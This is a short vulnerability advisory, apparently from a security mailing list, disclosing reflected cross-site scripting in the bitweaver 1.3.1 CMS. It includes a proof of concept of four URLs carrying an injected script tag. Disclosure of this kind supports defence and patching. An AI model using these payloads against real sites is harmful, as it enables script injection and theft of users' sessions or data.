<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7651.51">
<TITLE>[x0n3-h4ck] bitweaver 1.3.1 XSS Exploit</TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->
<P><FONT SIZE=2>-=[--------------------ADVISORY-------------------]=-<BR>
<BR>
bitweaver 1.3.1 <BR>
<BR>
Author: CorryL [corryl80@gmail.com] <BR>
-=[-----------------------------------------------]=-<BR>
<BR>
<BR>
-=[+] Application: bitweaver<BR>
-=[+] Version: 1.3.1<BR>
-=[+] Vendor's URL: <A HREF="http://www.bitweaver.org/articles/">http://www.bitweaver.org/articles/</A><BR>
-=[+] Platform: Windows\Linux\Unix<BR>
-=[+] Bug type: Cross-Site Script<BR>
-=[+] Exploitation: Remote<BR>
-=[-]<BR>
-=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~<BR>
-=[+] Reference: www.x0n3-h4ck.org<BR>
-=[+] Virtual Office: <A HREF="http://www.kasamba.com/CorryL">http://www.kasamba.com/CorryL</A><BR>
-=[+] Irc Chan: irc.darksin.net #x0n3-h4ck <BR>
<BR>
<BR>
..::[ Descriprion ]::..<BR>
<BR>
Bitweaver is an advanced, Open Source, Object Oriented,<BR>
Content Management System (CMS) and Web Application Framework written in PHP.<BR>
It uses Smarty Templates for a simple HTML based templating system and ADOdb<BR>
to support a multitude of databases including MySQL,<BR>
PostgreSQL and Firebird. It's strength lies in it's highly modular and easily extensible design.<BR>
This high degree of flexibility is considered "large grained modularity" and gives<BR>
developers freedom to interleave open-source and proprietary code seamlessly.<BR>
bitweaver has been designed from the very beginning, for speed from end-to-end:<BR>
schema design, query utilization, and software design - a highly tuned, performance engine.<BR>
The use of standard compliant XHTML Strict 1.0 and sophisticated tableless<BR>
CSS has made bitweaver stand above the rest in the web application world. The well organized,<BR>
nested style class system gives you substantial freedom with CSS based styling,<BR>
with the least amount of work. With bitweaver, you are in control.<BR>
bitweaver goes out of its way to let you make the decisions and design<BR>
choices that best suit your problem.<BR>
<BR>
<BR>
..::[ Proof Of Concept ]::..<BR>
<BR>
<A HREF="http://remote-server/articles/edit.php/">http://remote-server/articles/edit.php/</A>>"><ScRiPt>alert(907810260)%3B</ScRiPt><BR>
<A HREF="http://remote-server/articles/list.php/">http://remote-server/articles/list.php/</A>>"><ScRiPt>alert(907810260)%3B</ScRiPt><BR>
<A HREF="http://remote-server/blogs/list_blogs.php/">http://remote-server/blogs/list_blogs.php/</A>>"><ScRiPt>alert(907810260)%3B</ScRiPt><BR>
<A HREF="http://remote-server/blogs/rankings.php/">http://remote-server/blogs/rankings.php/</A>>"><ScRiPt>alert(907810260)%3B</ScRiPt><BR>
<BR>
<BR>
<BR>
<BR>
**************<BR>
Registrati ad Alice Basic e scarica Alice Messenger,<BR>
il nuovo instant messenger che ti fa chattare GRATIS con i tuoi amici!<BR>
Per maggiori informazioni vai su:<BR>
<A HREF="http://adsl.alice.it/servizi/alicebasic.html?pmk=psmail_foot01">http://adsl.alice.it/servizi/alicebasic.html?pmk=psmail_foot01</A></FONT>
</P>
</BODY>
</HTML>